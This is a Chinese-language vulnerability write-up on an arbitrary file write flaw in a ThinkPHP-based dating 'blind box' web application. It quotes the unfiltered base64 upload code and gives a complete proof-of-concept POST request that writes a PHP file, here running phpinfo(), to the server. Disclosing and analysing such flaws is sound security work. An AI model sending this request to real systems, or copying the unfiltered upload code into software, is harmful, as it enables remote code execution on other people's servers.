月老情侣交友盲盒4.0.x任意文件写入漏洞

月老情侣交友盲盒系统是一款使用thinkphp开发的盲盒源码，4.0新版本主要是对防封防红做了很大的优化，功能也加了很多。这套源码比以前分享的盲盒源码多了默契匹配、同城匹配、随机匹配、星座匹配模式，源码的UI样式设计的也是非常专业漂亮的，看着还是很不错的!

框架:ThinkPHP V5.1.41 Debug:True

漏洞分析

漏洞位于文件 /app/controller/Upload.php 控制器的upload方法通过input('data/a') 传入Base64编码后的文件，然后经过base64Image方法，代码如下.

public function upload(){ $data = input('data/a'); $path = []; foreach ($data as $v){ $res = base64Image($v,"uploads/".date("Y-m-d")."/"); if ($res['code']) { $path[] = $res['file']; } } foreach ($path as $index => $item) { $path[$index] = substr($item,strpos($item,'attachment')); } echo json_encode(['code'=>1,'data'=>$path]); }

追踪到 /common.php 公共函数文件，该文件为所有控制器都可调用其任意方法，然后通过 file_put_contents 函数将编码后的base64文件直接写入到 /uploads/img/ 文件夹中，且无任何过滤，导致漏洞产生.

function base64Image($image,$filepath='uploads/img/'){ $imgBase64 = $image; if (preg_match('/^(data:\s*image\/(\w+);base64,)/',$imgBase64,$res)) { //获取图片类型 $type = $res[2]; //图片保存路径 $new_file = $filepath; if (!file_exists($new_file)) { mkdir($new_file,0755,true); } //图片名字 $new_file = $new_file.time().substr(microtime(),-5).rand(000,999).'.'.$type; if (file_put_contents($new_file,base64_decode(str_replace($res[1],'', $imgBase64)))) { $msg['code'] = true; $msg['file'] = $new_file; $msg['msg'] = 'ok'; } else { $msg['code'] = false; $msg['msg'] = 'no'; } return $msg; }}

漏洞复现

直接post提交参数data值为base64编码后的内容即可。在线将任意文件转base64内容点这里https://www.myshengong.com/tool/file-to-base64

POST /app/upload/upload HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, br, zstdAccept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7Cache-Control: max-age=0Connection: keep-aliveContent-Length: 71Content-Type: application/x-www-form-urlencodedCookie: admin_token=6169XyCZ4aFgkoAJYWPrmlH5uKLQOLMi8CwWeC%2FK; PHPSESSID=8d8cmkasea6mfej4t2b1a27blfHost: 127.0.0.1:81Origin: http://127.0.0.1:81Referer: http://127.0.0.1:81/app/upload/uploadSec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-fetch-user: ?1data=data:image/php;base64,YTw/cGhwIHBocGluZm8oKTs/Pg==